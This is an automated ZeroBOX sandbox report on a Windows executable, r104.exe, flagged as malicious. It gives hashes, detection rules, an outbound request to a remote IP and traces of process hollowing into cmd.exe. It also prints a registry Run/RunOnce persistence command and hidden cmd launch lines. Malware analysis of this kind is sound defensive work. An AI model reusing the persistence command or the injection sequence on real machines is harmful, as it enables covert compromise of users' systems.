Summary | ZeroBOX

r104.exe

Category Machine Started Completed
FILE s1_win7_x6402 April 2, 2021, 10:35 a.m. April 2, 2021, 10:45 a.m.
Size 367.5KB
Type PE32+ executable (console) x86-64, for MS Windows
MD5 d2749c21fa8671e75cd147380ff110e0
SHA256 3dbab512123a36954684474e9a9f5502aa9edf0228a4df8f0cb33e328890d33b
CRC32 54565859
ssdeep 6144:BABatTx4LuLbY0xtTZrLRcBDrh15kk5XvI9eNtlhzQKOR64sWkxfkEW5sX2Lg:qc4utt95cBX8ejWT9kvW5s
Yara
  • PE_Header_Zero - PE File Signature Zero
  • OS_Processor_Check_Zero - OS Processor Check Signature Zero
  • win_files_operation - Affect private profile
  • IsPE64 - (no description)
  • IsConsole - (no description)
  • HasDebugData - DebugData Check
  • HasRichSignature - Rich Signature Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
172.217.25.14 Active Moloch
34.212.193.150 Active Moloch
8.8.7.7 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET https://34.212.193.150/kenichi/aura20b/zero21
request GET https://34.212.193.150/kenichi/aura20b/zero21
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 8212
region_size: 143360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8152
region_size: 143360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8636
region_size: 143360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6708
region_size: 143360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077219000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077218000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\RT4315F.exe
cmdline cmd.exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 7724
thread_handle: 0x00000000000000c0
process_identifier: 3172
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\r104.exe VVWDQI5
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000c4
1 1 0

CreateProcessInternalW

thread_identifier: 4772
thread_handle: 0x00000000000000bc
process_identifier: 3916
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NHXU1K
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000c0
1 1 0

CreateProcessInternalW

thread_identifier: 3080
thread_handle: 0x00000000000000c0
process_identifier: 4104
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000c4
1 1 0
APEX Malicious
Paloalto generic.ml
Kaspersky UDS:DangerousObject.Multi.Generic
Avast FileRepMetagen [Malware]
Kingsoft Win32.Hack.Undef.(kcloud)
AVG FileRepMetagen [Malware]
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
cmdline ping 8.8.7.7 -n 2
cmdline cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NHXU1K
cmdline cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE
cmdline cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\r104.exe VVWDQI5
host 172.217.25.14
host 34.212.193.150
host 8.8.7.7
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 5012
region_size: 139264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000004a720000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000118
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\L6BC9S31KAU reg_value cmd.exe /c reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v J7VKJT64 /t REG_SZ /d "C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE" & start "H" C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE
file C:\Users\test22\AppData\Local\Temp\RT4315F.exe
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@غ´ Í!¸LÍ!This program cannot be run in DOS mode. $“Ôâÿ×µŒ¬×µŒ¬×µŒ¬õՊ­ÖµŒ¬õՍ­ÒµŒ¬×µ¬ÅµŒ¬×µŒ¬ÄµŒ¬@뎭ֵŒ¬Rich×µŒ¬PEd†9”e`ð" Î$Ô!rJ `ƒ p°à.textÊÍÎ `.rdataàÒ@@.dataÂðÚ@À.pdatapÜ@@
base_address: 0x000000004a720000
process_identifier: 5012
process_handle: 0x0000000000000118
1 1 0

WriteProcessMemory

buffer: ErrCodeid%d&=ABCDEFGHIJKLMNOPQRTSUVWXYZ0123456789‡¦ÜsψMªK.$¥à¤Â$WN/ó_ÙåӐLòøE:ЉªK.$9”e`  b0p`àR 1 0 P p `ÀÐàð E 0 P p `ÀÐàð  b0Pp`àð ¢ 0 P p `ÀÐàðbp` b 0 P p `ÀÐàð  ’0Pp`à W 0 P p `ÀÐàð  0 P p `ÀÐàð  ¢0Pp`àð  0 P p `ÀÐàð  "0Pp`àð  0 P p `ÀÐàð  0Pp`à ’ 0 P p `ÀÐàðÒ0p` = 0 P p `ÀÐàð â 0 P p `ÀÐàð ‚ 0 P p `ÀÐàð ' 0 P p `ÀÐàð0p`p`20p`B  0 P p `ÀÐàð  0 P p `ÀÐàð h+ 0 P p `ÀÐàð"` 5 0 P p `ÀÐàð R 0 P p `ÀÐàð  B0p`à’ 0 Pp`Ààð h  0 P p `ÀÐàð  0 P p `ÀÐàðR0p`b0Pp`  0 P p `ÀÐàð  0 P p `ÀÐàð h; 0 P p `ÀÐàð  0 P p `ÀÐàðR`Âp`"0Pp`0Pp`  "0Pp`à"0p`R 0 Pp`Ààð  R0Pp`à’0p`Bp`2`  00Pp`à hâ 0 P p `ÀÐàð h7 0 P p `ÀÐàð h# 0 P p `ÀÐàð  r0Pp`à  p` % 0 P p `ÀÐàð  p`  p`  ¢0p`à  B 0p`Ààð O 0 P p `ÀÐàð‚0Pp` + 0 P p `ÀÐàðr`  ‚0p`à ó 0 P p `ÀÐàð
base_address: 0x000000004a73e000
process_identifier: 5012
process_handle: 0x0000000000000118
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x000000004a73f000
process_identifier: 5012
process_handle: 0x0000000000000118
1 1 0

WriteProcessMemory

buffer: ÃÌàÃPÔàPäàÒ!ìàÜ!M*áP*¤+á¤+-0á-¦-Há¦-G0ÜãG0¾1Tá¾1 6Üã 6›6lá›6(;ã(;_|á_¥d”á¥dhPâh,j¬á,j‰yÀá‰y2{Tá2{ ~Øá ~ºìẁڃâڃnˆânˆâ‰hââ‰É‹,âɋ\¡8â\¡¶¨”ᶨ¹«P⹫­hâ­Ì²ã̲ɀâɎÍÄãŽÍ ÔÄå Ô0՘â0ÕÇÕ(äÇÕJÖ¤âJÖÖÖ¤âÖÖ¿Ø`ã¿ØÜÜìáÜÜNÝ°âNÝ]ÞHá`Þá0áá)á¼â)áÀêÄâÀêìÌàìóÜâóeö0áeö_ÿôâ`ÿ*ã*˜¼â¨tãtH0ãHŠ8ãŠÓPãÓz`ãz˜!tã˜!ç!Pãç!Û'PâÜ'æ+ãæ+.Üã.´.¨ã´./´ã/Ù3ÄãÙ3Ô5ÜãÔ5”Gôã”G€Hä€HüH(äüHxI0ãxIFJ0ä‰J±Ktä±K~L<ä~LøMDäøMÀPÜãÀP³RTä´R€S˜â€S}Tdä}TFVtäFVÌV°âÌVÍW€äÍWÃX”äÃXUY¤äUY¿Y°ä¿YøY¼äøYØ[TáØ[ÕaÄäÕa#eØä#e¾gÜã¾gˆqôäˆqëvåëvÎw,åÎwx,åx{y,å{y_}ìá_}€~<å€~°ƒHå°ƒ†`冶‡l嶇vˆxåvˆ‰ˆå‰0¬œå0¬®Ü㐮±8ã±b±¼âb±þ²´åþ²QµÄåQµ)¸0á)¸?»Pâ?»<Áã<ÁÔÂTáÔÂqÉÜåqɻɨã»ÉʨãÊJÊPãLÊžËäåžËêÏPâêÏÉÝôå
base_address: 0x000000004a741000
process_identifier: 5012
process_handle: 0x0000000000000118
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@غ´ Í!¸LÍ!This program cannot be run in DOS mode. $“Ôâÿ×µŒ¬×µŒ¬×µŒ¬õՊ­ÖµŒ¬õՍ­ÒµŒ¬×µ¬ÅµŒ¬×µŒ¬ÄµŒ¬@뎭ֵŒ¬Rich×µŒ¬PEd†9”e`ð" Î$Ô!rJ `ƒ p°à.textÊÍÎ `.rdataàÒ@@.dataÂðÚ@À.pdatapÜ@@
base_address: 0x000000004a720000
process_identifier: 5012
process_handle: 0x0000000000000118
1 1 0
Process injection Process 6708 called NtSetContextThread to modify thread in remote process 5012
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.r14: 0
registers.r15: 0
registers.rcx: 1248993748
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 1636760
registers.r11: 0
registers.r8: 0
registers.r9: 0
registers.rip: 1998505216
registers.rdx: 8796092887040
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
thread_handle: 0x00000000000000d4
process_identifier: 5012
1 0 0
Process injection Process 3172 resumed a thread in remote process 8152
Process injection Process 3916 resumed a thread in remote process 8636
Process injection Process 4104 resumed a thread in remote process 6708
Process injection Process 6708 resumed a thread in remote process 5012
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 8152
1 0 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 8636
1 0 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 6708
1 0 0

NtResumeThread

thread_handle: 0x00000000000000d4
suspend_count: 1
process_identifier: 5012
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 7724
thread_handle: 0x00000000000000c0
process_identifier: 3172
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\r104.exe VVWDQI5
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000c4
1 1 0

CreateProcessInternalW

thread_identifier: 1472
thread_handle: 0x0000000000000060
process_identifier: 7400
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 8.8.7.7 -n 2
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

CreateProcessInternalW

thread_identifier: 4716
thread_handle: 0x0000000000000064
process_identifier: 8152
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\r104.exe
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\r104.exe VVWDQI5
filepath_r: C:\Users\test22\AppData\Local\Temp\r104.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000060
1 1 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 8152
1 0 0

NtResumeThread

thread_handle: 0x00000000000000c4
suspend_count: 1
process_identifier: 7400
1 0 0

CreateProcessInternalW

thread_identifier: 4772
thread_handle: 0x00000000000000bc
process_identifier: 3916
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NHXU1K
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000c0
1 1 0

CreateProcessInternalW

thread_identifier: 7552
thread_handle: 0x0000000000000060
process_identifier: 4404
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 8.8.7.7 -n 2
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

CreateProcessInternalW

thread_identifier: 9100
thread_handle: 0x0000000000000064
process_identifier: 8636
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\RT4315F.exe
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\RT4315F.exe NHXU1K
filepath_r: C:\Users\test22\AppData\Local\Temp\RT4315F.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000060
1 1 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 8636
1 0 0

NtResumeThread

thread_handle: 0x00000000000000bc
suspend_count: 1
process_identifier: 4404
1 0 0

CreateProcessInternalW

thread_identifier: 3080
thread_handle: 0x00000000000000c0
process_identifier: 4104
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000c4
1 1 0

CreateProcessInternalW

thread_identifier: 3632
thread_handle: 0x0000000000000060
process_identifier: 2736
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 8.8.7.7 -n 2
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

CreateProcessInternalW

thread_identifier: 2860
thread_handle: 0x0000000000000064
process_identifier: 6708
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\RT4315F.exe
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE
filepath_r: C:\Users\test22\AppData\Local\Temp\RT4315F.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000060
1 1 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 6708
1 0 0

NtResumeThread

thread_handle: 0x00000000000000bc
suspend_count: 1
process_identifier: 2736
1 0 0

CreateProcessInternalW

thread_identifier: 3864
thread_handle: 0x00000000000000d4
process_identifier: 5012
current_directory:
filepath:
track: 1
command_line: cmd.exe
filepath_r:
stack_pivoted: 0
creation_flags: 20 (CREATE_NEW_CONSOLE|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000000000000118
1 1 0

NtGetContextThread

thread_handle: 0x00000000000000d4
1 0 0

NtUnmapViewOfSection

base_address: 0x000000004a720000
region_size: 4096
process_identifier: 5012
process_handle: 0x0000000000000118
1 0 0

NtAllocateVirtualMemory

process_identifier: 5012
region_size: 139264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000004a720000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000118
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@غ´ Í!¸LÍ!This program cannot be run in DOS mode. $“Ôâÿ×µŒ¬×µŒ¬×µŒ¬õՊ­ÖµŒ¬õՍ­ÒµŒ¬×µ¬ÅµŒ¬×µŒ¬ÄµŒ¬@뎭ֵŒ¬Rich×µŒ¬PEd†9”e`ð" Î$Ô!rJ `ƒ p°à.textÊÍÎ `.rdataàÒ@@.dataÂðÚ@À.pdatapÜ@@
base_address: 0x000000004a720000
process_identifier: 5012
process_handle: 0x0000000000000118
1 1 0

WriteProcessMemory

buffer:
base_address: 0x000000004a721000
process_identifier: 5012
process_handle: 0x0000000000000118
1 1 0

WriteProcessMemory

buffer: ErrCodeid%d&=ABCDEFGHIJKLMNOPQRTSUVWXYZ0123456789‡¦ÜsψMªK.$¥à¤Â$WN/ó_ÙåӐLòøE:ЉªK.$9”e`  b0p`àR 1 0 P p `ÀÐàð E 0 P p `ÀÐàð  b0Pp`àð ¢ 0 P p `ÀÐàðbp` b 0 P p `ÀÐàð  ’0Pp`à W 0 P p `ÀÐàð  0 P p `ÀÐàð  ¢0Pp`àð  0 P p `ÀÐàð  "0Pp`àð  0 P p `ÀÐàð  0Pp`à ’ 0 P p `ÀÐàðÒ0p` = 0 P p `ÀÐàð â 0 P p `ÀÐàð ‚ 0 P p `ÀÐàð ' 0 P p `ÀÐàð0p`p`20p`B  0 P p `ÀÐàð  0 P p `ÀÐàð h+ 0 P p `ÀÐàð"` 5 0 P p `ÀÐàð R 0 P p `ÀÐàð  B0p`à’ 0 Pp`Ààð h  0 P p `ÀÐàð  0 P p `ÀÐàðR0p`b0Pp`  0 P p `ÀÐàð  0 P p `ÀÐàð h; 0 P p `ÀÐàð  0 P p `ÀÐàðR`Âp`"0Pp`0Pp`  "0Pp`à"0p`R 0 Pp`Ààð  R0Pp`à’0p`Bp`2`  00Pp`à hâ 0 P p `ÀÐàð h7 0 P p `ÀÐàð h# 0 P p `ÀÐàð  r0Pp`à  p` % 0 P p `ÀÐàð  p`  p`  ¢0p`à  B 0p`Ààð O 0 P p `ÀÐàð‚0Pp` + 0 P p `ÀÐàðr`  ‚0p`à ó 0 P p `ÀÐàð
base_address: 0x000000004a73e000
process_identifier: 5012
process_handle: 0x0000000000000118
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x000000004a73f000
process_identifier: 5012
process_handle: 0x0000000000000118
1 1 0

WriteProcessMemory

buffer: ÃÌàÃPÔàPäàÒ!ìàÜ!M*áP*¤+á¤+-0á-¦-Há¦-G0ÜãG0¾1Tá¾1 6Üã 6›6lá›6(;ã(;_|á_¥d”á¥dhPâh,j¬á,j‰yÀá‰y2{Tá2{ ~Øá ~ºìẁڃâڃnˆânˆâ‰hââ‰É‹,âɋ\¡8â\¡¶¨”ᶨ¹«P⹫­hâ­Ì²ã̲ɀâɎÍÄãŽÍ ÔÄå Ô0՘â0ÕÇÕ(äÇÕJÖ¤âJÖÖÖ¤âÖÖ¿Ø`ã¿ØÜÜìáÜÜNÝ°âNÝ]ÞHá`Þá0áá)á¼â)áÀêÄâÀêìÌàìóÜâóeö0áeö_ÿôâ`ÿ*ã*˜¼â¨tãtH0ãHŠ8ãŠÓPãÓz`ãz˜!tã˜!ç!Pãç!Û'PâÜ'æ+ãæ+.Üã.´.¨ã´./´ã/Ù3ÄãÙ3Ô5ÜãÔ5”Gôã”G€Hä€HüH(äüHxI0ãxIFJ0ä‰J±Ktä±K~L<ä~LøMDäøMÀPÜãÀP³RTä´R€S˜â€S}Tdä}TFVtäFVÌV°âÌVÍW€äÍWÃX”äÃXUY¤äUY¿Y°ä¿YøY¼äøYØ[TáØ[ÕaÄäÕa#eØä#e¾gÜã¾gˆqôäˆqëvåëvÎw,åÎwx,åx{y,å{y_}ìá_}€~<å€~°ƒHå°ƒ†`冶‡l嶇vˆxåvˆ‰ˆå‰0¬œå0¬®Ü㐮±8ã±b±¼âb±þ²´åþ²QµÄåQµ)¸0á)¸?»Pâ?»<Áã<ÁÔÂTáÔÂqÉÜåqɻɨã»ÉʨãÊJÊPãLÊžËäåžËêÏPâêÏÉÝôå
base_address: 0x000000004a741000
process_identifier: 5012
process_handle: 0x0000000000000118
1 1 0

NtSetContextThread

registers.r14: 0
registers.r15: 0
registers.rcx: 1248993748
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 1636760
registers.r11: 0
registers.r8: 0
registers.r9: 0
registers.rip: 1998505216
registers.rdx: 8796092887040
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
thread_handle: 0x00000000000000d4
process_identifier: 5012
1 0 0

NtResumeThread

thread_handle: 0x00000000000000d4
suspend_count: 1
process_identifier: 5012
1 0 0